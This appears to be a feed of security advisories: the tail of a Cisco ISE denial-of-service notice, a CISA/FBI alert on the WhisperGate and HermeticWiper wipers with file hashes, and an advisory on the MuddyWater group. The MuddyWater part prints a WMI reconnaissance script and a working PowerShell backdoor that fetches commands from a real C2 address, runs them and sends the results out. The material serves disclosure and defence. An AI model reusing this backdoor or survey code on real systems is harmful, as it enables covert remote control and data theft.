
This vulnerability is due to improper handling of certain RADIUS requests. An attacker could exploit this vulnerability by attempting to authenticate to a network or a service where the access server is using Cisco ISE as the RADIUS server. A successful exploit could allow the attacker to cause Cisco ISE to stop processing RADIUS requests, causing authentication/authorization timeouts, which would then result in legitimate requests being denied access.

Note: To recover the ability to process RADIUS packets, a manual restart of the affected Policy Service Node (PSN) is required. See the Details section for more information.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-dos-JLh9TxBp


Security Impact Rating: High
CVE: CVE-2022-20756
Categories: Security Alerts

AA22-057A: Destructive Malware Targeting Organizations in Ukraine

US-CERT - Sat, 2022-02-26 07:00
Original release date: February 26, 2022
Summary

Actions to Take Today:
• Set antivirus and antimalware programs to conduct regular scans.
• Enable strong spam filters to prevent phishing emails from reaching end users.
• Filter network traffic.
• Update software.
• Require multifactor authentication.

Leading up to Russia’s unprovoked attack against Ukraine, threat actors deployed destructive malware against organizations in Ukraine to destroy computer systems and render them inoperable. 

  • On January 15, 2022, the Microsoft Threat Intelligence Center (MSTIC) disclosed that malware, known as WhisperGate, was being used to target organizations in Ukraine. According to Microsoft, WhisperGate is intended to be destructive and is designed to render targeted devices inoperable. 
  • On February 23, 2022, several cybersecurity researchers disclosed that malware known as HermeticWiper was being used against organizations in Ukraine. According to SentinelLabs, the malware targets Windows devices, manipulating the master boot record, which results in subsequent boot failure. 

Destructive malware can present a direct threat to an organization’s daily operations, impacting the availability of critical assets and data. Further disruptive cyberattacks against organizations in Ukraine are likely to occur and may unintentionally spill over to organizations in other countries. Organizations should increase vigilance and evaluate their capabilities encompassing planning, preparation, detection, and response for such an event. 

This joint Cybersecurity Advisory (CSA) between the Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) provides information on WhisperGate and HermeticWiper malware as well as open-source indicators of compromise (IOCs) for organizations to detect and prevent the malware. Additionally, this joint CSA provides recommended guidance and considerations for organizations to address as part of network architecture, security baseline, continuous monitoring, and incident response practices.

Click here for a PDF version of this report.

Technical Details

Threat actors have deployed destructive malware, including both WhisperGate and HermeticWiper, against organizations in Ukraine to destroy computer systems and render them inoperable. Listed below are high-level summaries of campaigns employing the malware. CISA recommends organizations review the resources listed below for more in-depth analysis and see the Mitigation section for best practices on handling destructive malware.   

On January 15, 2022, Microsoft announced the identification of a sophisticated malware operation targeting multiple organizations in Ukraine. The malware, known as WhisperGate, has two stages that corrupts a system’s master boot record, displays a fake ransomware note, and encrypts files based on certain file extensions. Note: although a ransomware message is displayed during the attack, Microsoft highlighted that the targeted data is destroyed, and is not recoverable even if a ransom is paid. See Microsoft’s blog on Destructive malware targeting Ukrainian organizations for more information and see the IOCs in table 1. 

Table 1: IOCs associated with WhisperGate

Name File Category File Hash Source WhisperGate   stage1.exe 

a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92

Microsoft MSTIC   WhisperGate stage2.exe

dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78

Microsoft MSTIC

 

On February 23, 2022, cybersecurity researchers disclosed that malware known as HermeticWiper was being used against organizations in Ukraine. According to SentinelLabs, the malware targets Windows devices, manipulating the master boot record and resulting in subsequent boot failure. Note: according to Broadcom, “[HermeticWiper] has some similarities to the earlier WhisperGate wiper attacks against Ukraine, where the wiper was disguised as ransomware.” See the following resources for more information and see the IOCs in table 2 below. 

Table 2: IOCs associated with HermeticWiper

Name File Category File Hash Source Win32/KillDisk.NCV Trojan 912342F1C840A42F6B74132F8A7C4FFE7D40FB77
61B25D11392172E587D8DA3045812A66C3385451
  ESET research HermeticWiper Win32 EXE 912342f1c840a42f6b74132f8a7c4ffe7d40fb77

SentinelLabs

HermeticWiper Win32 EXE 61b25d11392172e587d8da3045812a66c3385451

SentinelLabs

RCDATA_DRV_X64 ms-compressed a952e288a1ead66490b3275a807f52e5

SentinelLabs

RCDATA_DRV_X86 ms-compressed 231b3385ac17e41c5bb1b1fcb59599c4

SentinelLabs

RCDATA_DRV_XP_X64 ms-compressed 095a1678021b034903c85dd5acb447ad

SentinelLabs

RCDATA_DRV_XP_X86  ms-compressed eb845b7a16ed82bd248e395d9852f467

SentinelLabs

Trojan.Killdisk Trojan.Killdisk  1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 Symantec Threat Hunter Team Trojan.Killdisk Trojan.Killdisk 0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da  Symantec Threat Hunter Team Trojan.Killdisk Trojan.Killdisk a64c3e0522fad787b95bfb6a30c3aed1b5786e69e88e023c062ec7e5cebf4d3e Symantec Threat Hunter Team Ransomware Trojan.Killdisk 4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 Symantec Threat Hunter Team MitigationsBest Practices for Handling Destructive Malware

As previously noted above, destructive malware can present a direct threat to an organization’s daily operations, impacting the availability of critical assets and data. Organizations should increase vigilance and evaluate their capabilities, encompassing planning, preparation, detection, and response, for such an event. This section is focused on the threat of malware using enterprise-scale distributed propagation methods and provides recommended guidance and considerations for an organization to address as part of their network architecture, security baseline, continuous monitoring, and incident response practices. 

CISA and the FBI urge all organizations to implement the following recommendations to increase their cyber resilience against this threat.

Potential Distribution Vectors

Destructive malware may use popular communication tools to spread, including worms sent through email and instant messages, Trojan horses dropped from websites, and virus-infected files downloaded from peer-to-peer connections. Malware seeks to exploit existing vulnerabilities on systems for quiet and easy access.

The malware has the capability to target a large scope of systems and can execute across multiple systems throughout a network. As a result, it is important for organizations to assess their environment for atypical channels for malware delivery and/or propagation throughout their systems. Systems to assess include:

  • Enterprise applications – particularly those that have the capability to directly interface with and impact multiple hosts and endpoints. Common examples include:
    • Patch management systems,
    • Asset management systems,
    • Remote assistance software (typically used by the corporate help desk),
    • Antivirus (AV) software,
    • Systems assigned to system and network administrative personnel,
    • Centralized backup servers, and
    • Centralized file shares.

While not only applicable to malware, threat actors could compromise additional resources to impact the availability of critical data and applications. Common examples include:

  • Centralized storage devices
    • Potential risk – direct access to partitions and data warehouses.
  • Network devices
    • Potential risk – capability to inject false routes within the routing table, delete specific routes from the routing table, remove/modify, configuration attributes, or destroy firmware or system binaries—which could isolate or degrade availability of critical network resources.
Best Practices and Planning Strategies

Common strategies can be followed to strengthen an organization’s resilience against destructive malware. Targeted assessment and enforcement of best practices should be employed for enterprise components susceptible to destructive malware.

Communication Flow
  • Ensure proper network segmentation.
  • Ensure that network-based access control lists (ACLs) are configured to permit server-to-host and host-to-host connectivity via the minimum scope of ports and protocols and that directional flows for connectivity are represented appropriately.
    • Communications flow paths should be fully defined, documented, and authorized.
  • Increase awareness of systems that can be used as a gateway to pivot (lateral movement) or directly connect to additional endpoints throughout the enterprise.
    • Ensure that these systems are contained within restrictive Virtual Local Area Networks (VLANs), with additional segmentation and network access controls.
  • Ensure that centralized network and storage devices’ management interfaces reside on restrictive VLANs.
    • Layered access control, and
    • Device-level access control enforcement – restricting access from only pre-defined VLANs and trusted IP ranges.
Access Control
  • For enterprise systems that can directly interface with multiple endpoints:
    • Require multifactor authentication for interactive logons.
    • Ensure that authorized users are mapped to a specific subset of enterprise personnel.
      • If possible, the “Everyone,” “Domain Users,” or the “Authenticated Users” groups should not be permitted the capability to directly access or authenticate to these systems.
    • Ensure that unique domain accounts are used and documented for each enterprise application service.
      • Context of permissions assigned to these accounts should be fully documented and configured based upon the concept of least privilege.
      • Provides an enterprise with the capability to track and monitor specific actions correlating to an application’s assigned service account.
    • If possible, do not grant a service account with local or interactive logon permissions.
      • Service accounts should be explicitly denied permissions to access network shares and critical data locations.
    • Accounts that are used to authenticate to centralized enterprise application servers or devices should not contain elevated permissions on downstream systems and resources throughout the enterprise.
  • Continuously review centralized file share ACLs and assigned permissions.
    • Restrict Write/Modify/Full Control permissions when possible.
Monitoring
  • Audit and review security logs for anomalous references to enterprise-level administrative (privileged) and service accounts.
    • Failed logon attempts,
    • File share access, and
    • Interactive logons via a remote session.
  • Review network flow data for signs of anomalous activity, including:
    • Connections using ports that do not correlate to the standard communications flow associated with an application,
    • Activity correlating to port scanning or enumeration, and
    • Repeated connections using ports that can be used for command and control purposes.
  • Ensure that network devices log and audit all configuration changes.
    • Continually review network device configurations and rule sets to ensure that communications flows are restricted to the authorized subset of rules.
File Distribution
  • When deploying patches or AV signatures throughout an enterprise, stage the distributions to include a specific grouping of systems (staggered over a pre-defined period).
    • This action can minimize the overall impact in the event that an enterprise patch management or AV system is leveraged as a distribution vector for a malicious payload.
  • Monitor and assess the integrity of patches and AV signatures that are distributed throughout the enterprise.
    • Ensure updates are received only from trusted sources,
    • Perform file and data integrity checks, and
    • Monitor and audit – as related to the data that is distributed from an enterprise application.
System and Application Hardening
  • Ensure robust vulnerability management and patching practices are in place. 
    • CISA maintains a living catalog of known exploited vulnerabilities that carry significant risk to federal agencies as well as public and private sectors entities. In addition to thoroughly testing and implementing vendor patches in a timely—and, if possible, automated— manner, organizations should ensure patching of the vulnerabilities CISA includes in this catalog.
  • Ensure that the underlying operating system (OS) and dependencies (e.g., Internet Information Services [IIS], Apache, Structured Query Language [SQL]) supporting an application are configured and hardened based upon industry-standard best practice recommendations. Implement application-level security controls based on best practice guidance provided by the vendor. Common recommendations include:
    • Use role-based access control,
    • Prevent end-user capabilities to bypass application-level security controls,
      • For example, do not allow users to disable AV on local workstations.
    • Remove, or disable unnecessary or unused features or packages, and
    • Implement robust application logging and auditing.
Recovery and Reconstitution Planning

A business impact analysis (BIA) is a key component of contingency planning and preparation. The overall output of a BIA will provide an organization with two key components (as related to critical mission/business operations):

  • Characterization and classification of system components, and
  • Interdependencies.

Based upon the identification of an organization’s mission critical assets (and their associated interdependencies), in the event that an organization is impacted by destructive malware, recovery and reconstitution efforts should be considered.

To plan for this scenario, an organization should address the availability and accessibility for the following resources (and should include the scope of these items within incident response exercises and scenarios):

  • Comprehensive inventory of all mission critical systems and applications:
    • Versioning information,
    • System/application dependencies,
    • System partitioning/storage configuration and connectivity, and
    • Asset owners/points of contact.
  • Contact information for all essential personnel within the organization,
  • Secure communications channel for recovery teams,
  • Contact information for external organizational-dependent resources:
    • Communication providers,
    • Vendors (hardware/software), and
    • Outreach partners/external stakeholders
  • Service contract numbers – for engaging vendor support,
  • Organizational procurement points of contact,
  • Optical disc image (ISO)/image files for baseline restoration of critical systems and applications:
    • OS installation media,
    • Service packs/patches,
    • Firmware, and
    • Application software installation packages.
  • Licensing/activation keys for OS and dependent applications,
  • Enterprise network topology and architecture diagrams,
  • System and application documentation,
  • Hard copies of operational checklists and playbooks,
  • System and application configuration backup files,
  • Data backup files (full/differential),
  • System and application security baseline and hardening checklists/guidelines, and
  • System and application integrity test and acceptance checklists.
Incident Response

Victims of a destructive malware attacks should immediately focus on containment to reduce the scope of affected systems. Strategies for containment include:

  • Determining a vector common to all systems experiencing anomalous behavior (or having been rendered unavailable)—from which a malicious payload could have been delivered:
    • Centralized enterprise application,
    • Centralized file share (for which the identified systems were mapped or had access),
    • Privileged user account common to the identified systems,
    • Network segment or boundary, and
    • Common Domain Name System (DNS) server for name resolution.
  • Based upon the determination of a likely distribution vector, additional mitigation controls can be enforced to further minimize impact:
    • Implement network-based ACLs to deny the identified application(s) the capability to directly communicate with additional systems,
      • Provides an immediate capability to isolate and sandbox specific systems or resources.
    • Implement null network routes for specific IP addresses (or IP ranges) from which the payload may be distributed,
      • An organization’s internal DNS can also be leveraged for this task, as a null pointer record could be added within a DNS zone for an identified server or application.
    • Readily disable access for suspected user or service account(s),
    • For suspect file shares (which may be hosting the infection vector), remove access or disable the share path from being accessed by additional systems, and
    • Be prepared to, if necessary, reset all passwords and tickets within directories (e.g., changing golden/silver tickets). 

As related to incident response and incident handling, organizations are encouraged to report incidents to the FBI and CISA (see the Contact section below) and to preserve forensic data for use in internal investigation of the incident or for possible law enforcement purposes. See Technical Approaches to Uncovering and Remediating Malicious Activity for more information.

Contact Information

All organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at central@cisa.dhs.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov.

Resources Revisions
  • February 26, 2022: Initial Revision

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-055A : Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks

US-CERT - Thu, 2022-02-24 08:00
Original release date: February 24, 2022
Summary

Actions to Take Today to Protect Against Malicious Activity
* Search for indicators of compromise.
* Use antivirus software.
* Patch all systems.
* Prioritize patching known exploited vulnerabilities.
* Train users to recognize and report phishing attempts.
* Use multi-factor authentication.

Note: this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, version 10. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) have observed a group of Iranian government-sponsored advanced persistent threat (APT) actors, known as MuddyWater, conducting cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors—including telecommunications, defense, local government, and oil and natural gas—in Asia, Africa, Europe, and North America. Note: MuddyWater is also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros.

MuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).[1] This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.

MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into running malware—and obfuscating PowerShell scripts to hide command and control (C2) functions. FBI, CISA, CNMF, and NCSC-UK have observed MuddyWater actors recently using various malware—variants of PowGoop, Small Sieve, Canopy (also known as Starwhale), Mori, and POWERSTATS—along with other tools as part of their malicious activity. 

This advisory provides observed tactics, techniques, and procedures (TTPs); malware; and indicators of compromise (IOCs) associated with this Iranian government-sponsored APT activity to aid organizations in the identification of malicious activity against sensitive networks. 

FBI, CISA, CNMF, NCSC-UK, and the National Security Agency (NSA) recommend organizations apply the mitigations in this advisory and review the following resources for additional information. Note: also see the Additional Resources section.

Click here for a PDF version of this report.

Technical Details

FBI, CISA, CNMF, and NCSC-UK have observed the Iranian government-sponsored MuddyWater APT group employing spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to gain access to sensitive government and commercial networks. 

As part of its spearphishing campaign, MuddyWater attempts to coax their targeted victim into downloading ZIP files, containing either an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that drops a malicious file to the victim’s network [T1566.001, T1204.002]. MuddyWater actors also use techniques such as side-loading DLLs [T1574.002] to trick legitimate programs into running malware and obfuscating PowerShell scripts [T1059.001] to hide C2 functions [T1027] (see the PowGoop section for more information). 

Additionally, the group uses multiple malware sets—including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS—for loading malware, backdoor access, persistence [TA0003], and exfiltration [TA0010]. See below for descriptions of some of these malware sets, including newer tools or variants to the group’s suite. Additionally, see Malware Analysis Report MAR-10369127.r1.v1: MuddyWater for further details.

PowGoop

MuddyWater actors use new variants of PowGoop malware as their main loader in malicious operations; it consists of a DLL loader and a PowerShell-based downloader. The malicious file impersonates a legitimate file that is signed as a Google Update executable file.

According to samples of PowGoop analyzed by CISA and CNMF, PowGoop consists of three components:

  • A DLL file renamed as a legitimate filename, Goopdate.dll, to enable the DLL side-loading technique [T1574.002]. The DLL file is contained within an executable, GoogleUpdate.exe. 
  • A PowerShell script, obfuscated as a .dat file, goopdate.dat, used to decrypt and run a second obfuscated PowerShell script, config.txt [T1059.001].
  • config.txt, an encoded, obfuscated PowerShell script containing a beacon to a hardcoded IP address.

These components retrieve encrypted commands from a C2 server. The DLL file hides communications with MuddyWater C2 servers by executing with the Google Update service. 

Small Sieve

According to a sample analyzed by NCSC-UK, Small Sieve is a simple Python [T1059.006] backdoor distributed using a Nullsoft Scriptable Install System (NSIS) installer, gram_app.exe. The NSIS installs the Python backdoor, index.exe, and adds it as a registry run key [T1547.001], enabling persistence [TA0003]. 

MuddyWater disguises malicious executables and uses filenames and Registry key names associated with Microsoft's Windows Defender to avoid detection during casual inspection. The APT group has also used variations of Microsoft (e.g., "Microsift") and Outlook in its filenames associated with Small Sieve [T1036.005].

Small Sieve provides basic functionality required to maintain and expand a foothold in victim infrastructure and avoid detection [TA0005] by using custom string and traffic obfuscation schemes together with the Telegram Bot application programming interface (API). Specifically, Small Sieve’s beacons and taskings are performed using Telegram API over Hypertext Transfer Protocol Secure (HTTPS) [T1071.001], and the tasking and beaconing data is obfuscated through a hex byte swapping encoding scheme combined with an obfuscated Base64 function [T1027], T1132.002].

Note: cybersecurity agencies in the United Kingdom and the United States attribute Small Sieve to MuddyWater with high confidence. 

See Appendix B for further analysis of Small Sieve malware.

Canopy

MuddyWater also uses Canopy/Starwhale malware, likely distributed via spearphishing emails with targeted attachments [T1566.001]. According to two Canopy/Starwhale samples analyzed by CISA, Canopy uses Windows Script File (.wsf) scripts distributed by a malicious Excel file. Note: the cybersecurity agencies of the United Kingdom and the United States attribute these malware samples to MuddyWater with high confidence. 

In the samples CISA analyzed, a malicious Excel file, Cooperation terms.xls, contained macros written in Visual Basic for Applications (VBA) and two encoded Windows Script Files. When the victim opens the Excel file, they receive a prompt to enable macros [T1204.002]. Once this occurs, the macros are executed, decoding and installing the two embedded Windows Script Files.

The first .wsf is installed in the current user startup folder [T1547.001] for persistence. The file contains hexadecimal (hex)-encoded strings that have been reshuffled [T1027]. The file executes a command to run the second .wsf.

The second .wsf also contains hex-encoded strings that have been reshuffled. This file collects [TA0035] the victim system’s IP address, computer name, and username [T1005]. The collected data is then hex-encoded and sent to an adversary-controlled IP address, http[:]88.119.170[.]124, via an HTTP POST request [T1041].

Mori

MuddyWater also uses the Mori backdoor that uses Domain Name System tunneling to communicate with the group’s C2 infrastructure [T1572]. 

According to one sample analyzed by CISA, FML.dll, Mori uses a DLL written in C++ that is executed with regsvr32.exe with export DllRegisterServer; this DLL appears to be a component to another program. FML.dll contains approximately 200MB of junk data [T1001.001] in a resource directory 205, number 105. Upon execution, FML.dll creates a mutex, 0x50504060, and performs the following tasks:

  • Deletes the file FILENAME.old and deletes file by registry value. The filename is the DLL file with a .old extension.
  • Resolves networking APIs from strings that are ADD-encrypted with the key 0x05.
  • Uses Base64 and Java Script Object Notation (JSON) based on certain key values passed to the JSON library functions. It appears likely that JSON is used to serialize C2 commands and/or their results.
  • Communicates using HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag, for C2 [T1071.001].
  • Reads and/or writes data from the following Registry Keys, HKLM\Software\NFC\IPA and HKLM\Software\NFC\(Default).
POWERSTATS

This group is also known to use the POWERSTATS backdoor, which runs PowerShell scripts to maintain persistent access to the victim systems [T1059.001]. 

CNMF has posted samples further detailing the different parts of MuddyWater’s new suite of tools— along with JavaScript files used to establish connections back to malicious infrastructure—to the malware aggregation tool and repository, Virus Total. Network operators who identify multiple instances of the tools on the same network should investigate further as this may indicate the presence of an Iranian malicious cyber actor.

MuddyWater actors are also known to exploit unpatched vulnerabilities as part of their targeted operations. FBI, CISA, CNMF, and NCSC-UK have observed this APT group recently exploiting the Microsoft Netlogon elevation of privilege vulnerability (CVE-2020-1472) and the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688). See CISA’s Known Exploited Vulnerabilities Catalog for additional vulnerabilities with known exploits and joint Cybersecurity Advisory: Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities for additional Iranian APT group-specific vulnerability exploits.

Survey Script

The following script is an example of a survey script used by MuddyWater to enumerate information about victim computers. It queries the Windows Management Instrumentation (WMI) service to obtain information about the compromised machine to generate a string, with these fields separated by a delimiter (e.g., ;; in this sample). The produced string is usually encoded by the MuddyWater implant and sent to an adversary-controlled IP address.

$O = Get-WmiObject Win32_OperatingSystem;$S = $O.Name;$S += ";;";$ips = "";Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | % {$ips = $ips + ", " + $_.IPAddress[0]};$S += $ips.substring(1);$S += ";;";$S += $O.OSArchitecture;$S += ";;";$S += [System.Net.DNS]::GetHostByName('').HostName;$S += ";;";$S += ((Get-WmiObject Win32_ComputerSystem).Domain);$S += ";;";$S += $env:UserName;$S += ";;";$AntiVirusProducts = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct  -ComputerName $env:computername;$resAnti = @();foreach($AntiVirusProduct in $AntiVirusProducts){$resAnti += $AntiVirusProduct.displayName};$S += $resAnti;echo $S; Newly Identified PowerShell Backdoor

The newly identified PowerShell backdoor used by MuddyWater below uses a single-byte Exclusive-OR (XOR) to encrypt communications with the key 0x02 to adversary-controlled infrastructure. The script is lightweight in functionality and uses the InvokeScript method to execute responses received from the adversary.

function encode($txt,$key){$enByte = [Text.Encoding]::UTF8.GetBytes($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$encodetxt = [Convert]::ToBase64String($enByte);return $encodetxt;}function decode($txt,$key){$enByte = [System.Convert]::FromBase64String($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$dtxt = [System.Text.Encoding]::UTF8.GetString($enByte);return $dtxt;}$global:tt=20;while($true){try{$w = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>');$w.proxy = [Net.WebRequest]::GetSystemWebProxy();$r=(New-Object System.IO.StreamReader($w.GetResponse().GetResponseStream())).ReadToEnd();if($r.Length -gt 0){$res=[string]$ExecutionContext.InvokeCommand.InvokeScript(( decode $r 2));$wr = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>');$wr.proxy = [Net.WebRequest]::GetSystemWebProxy();$wr.Headers.Add('cookie',(encode $res 2));$wr.GetResponse().GetResponseStream();}}catch {}Start-Sleep -Seconds $global:tt;} MITRE ATT&CK Techniques

MuddyWater uses the ATT&CK techniques listed in table 1.

Table 1: MuddyWater ATT&CK Techniques[2]

Technique Title ID Use Reconnaissance Gather Victim Identity Information: Email Addresses T1589.002 MuddyWater has specifically targeted government agency employees with spearphishing emails. Resource Development Acquire Infrastructure: Web Services T1583.006 MuddyWater has used file sharing services including OneHub to distribute tools. Obtain Capabilities: Tool T1588.002 MuddyWater has made use of legitimate tools ConnectWise and RemoteUtilities for access to target environments. Initial Access Phishing: Spearphishing Attachment T1566.001 MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments.  Phishing: Spearphishing Link T1566.002 MuddyWater has sent targeted spearphishing emails with malicious links. Execution Windows Management Instrumentation T1047 MuddyWater has used malware that leveraged Windows Management Instrumentation for execution and querying host information. Command and Scripting Interpreter: PowerShell T1059.001 MuddyWater has used PowerShell for execution. Command and Scripting Interpreter: Windows Command Shell 1059.003 MuddyWater has used a custom tool for creating reverse shells. Command and Scripting Interpreter: Visual Basic T1059.005 MuddyWater has used Virtual Basic Script (VBS) files to execute its POWERSTATS payload, as well as macros. Command and Scripting Interpreter: Python T1059.006 MuddyWater has used developed tools in Python including Out1.  Command and Scripting Interpreter: JavaScript T1059.007 MuddyWater has used JavaScript files to execute its POWERSTATS payload. Exploitation for Client Execution T1203 MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution. User Execution: Malicious Link T1204.001 MuddyWater has distributed URLs in phishing emails that link to lure documents. User Execution: Malicious File T1204.002 MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails. Inter-Process Communication: Component Object Model T1559.001 MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook. Inter-Process Communication: Dynamic Data Exchange T1559.002 MuddyWater has used malware that can execute PowerShell scripts via Dynamic Data Exchange. Persistence Scheduled Task/Job: Scheduled Task T1053.005 MuddyWater has used scheduled tasks to establish persistence. Office Application Startup: Office Template Macros T1137.001 MuddyWater has used a Word Template, Normal.dotm, for persistence. Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 MuddyWater has added Registry Run key KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding to establish persistence.  Privilege Escalation Abuse Elevation Control Mechanism: Bypass User Account Control  T1548.002 MuddyWater uses various techniques to bypass user account control. Credentials from Password Stores T1555 MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email. Credentials from Web Browsers

T1555.003

MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers. Defense Evasion Obfuscated Files or Information T1027 MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands. Steganography T1027.003 MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg. Compile After Delivery T1027.004 MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code. Masquerading: Match Legitimate Name or Location T1036.005 MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender. E.g., Small Sieve uses variations of Microsoft (Microsift) and Outlook in its filenames to attempt to avoid detection during casual inspection. Deobfuscate/Decode Files or Information

T1140

MuddyWater decoded Base64-encoded PowerShell commands using a VBS file. Signed Binary Proxy Execution: CMSTP

T1218.003

MuddyWater has used CMSTP.exe and a malicious .INF file to execute its POWERSTATS payload. Signed Binary Proxy Execution: Mshta T1218.005 MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution. Signed Binary Proxy Execution: Rundll32 T1218.011 MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll. Execution Guardrails T1480 The Small Sieve payload used by MuddyWater will only execute correctly if the word “Platypus” is passed to it on the command line. Impair Defenses: Disable or Modify Tools T1562.001 MuddyWater can disable the system's local proxy settings. Credential Access OS Credential Dumping: LSASS Memory T1003.001 MuddyWater has performed credential dumping with Mimikatz and procdump64.exe. OS Credential Dumping: LSA Secrets

T1003.004

MuddyWater has performed credential dumping with LaZagne. OS Credential Dumping: Cached Domain Credentials T1003.005 MuddyWater has performed credential dumping with LaZagne. Unsecured Credentials: Credentials In Files

T1552.001

MuddyWater has run a tool that steals passwords saved in victim email. Discovery  System Network Configuration Discovery T1016 MuddyWater has used malware to collect the victim’s IP address and domain name. System Owner/User Discovery T1033 MuddyWater has used malware that can collect the victim’s username. System Network Connections Discovery T1049 MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine. Process Discovery T1057 MuddyWater has used malware to obtain a list of running processes on the system. System Information Discovery

T1082

MuddyWater has used malware that can collect the victim’s OS version and machine name. File and Directory Discovery T1083 MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords "Kasper," "Panda," or "ESET." Account Discovery: Domain Account T1087.002 MuddyWater has used cmd.exe net user/domain to enumerate domain users. Software Discovery T1518 MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine. Security Software Discovery T1518.001 MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers. Collection Screen Capture T1113 MuddyWater has used malware that can capture screenshots of the victim’s machine.

Archive Collected Data: Archive via Utility

T1560.001 MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded. Command and Control Application Layer Protocol: Web Protocols T1071.001 MuddyWater has used HTTP for C2 communications. e.g., Small Sieve beacons and tasking are performed using the Telegram API over HTTPS. Proxy: External Proxy T1090.002

MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. 

MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to C2.

Web Service: Bidirectional Communication T1102.002 MuddyWater has used web services including OneHub to distribute remote access tools. Multi-Stage Channels T1104 MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back. Ingress Tool Transfer T1105 MuddyWater has used malware that can upload additional files to the victim’s machine. Data Encoding: Standard Encoding T1132.001 MuddyWater has used tools to encode C2 communications including Base64 encoding. Data Encoding: Non-Standard Encoding T1132.002 MuddyWater uses tools such as Small Sieve, which employs a custom hex byte swapping encoding scheme to obfuscate tasking traffic. Remote Access Software  T1219 MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally. Exfiltration Exfiltration Over C2 Channel T1041 MuddyWater has used C2 infrastructure to receive exfiltrated data.

 

MitigationsProtective Controls and Architecture
  • Deploy application control software to limit the applications and executable code that can be run by users. Email attachments and files downloaded via links in emails often contain executable code. 
Identity and Access Management
  • Use multifactor authentication where possible, particularly for webmail, virtual private networks, and accounts that access critical systems. 
  • Limit the use of administrator privileges. Users who browse the internet, use email, and execute code with administrator privileges make for excellent spearphishing targets because their system—once infected—enables attackers to move laterally across the network, gain additional accesses, and access highly sensitive information. 
Phishing Protection
  • Enable antivirus and anti-malware software and update signature definitions in a timely manner. Well-maintained antivirus software may prevent use of commonly deployed attacker tools that are delivered via spearphishing. 
  • Be suspicious of unsolicited contact via email or social media from any individual you do not know personally. Do not click on hyperlinks or open attachments in these communications.
  • Consider adding an email banner to emails received from outside your organization and disabling hyperlinks in received emails.
  • Train users through awareness and simulations to recognize and report phishing and social engineering attempts. Identify and suspend access of user accounts exhibiting unusual activity.
  • Adopt threat reputation services at the network device, operating system, application, and email service levels. Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spearphishing attacks. 
Vulnerability and Configuration Management
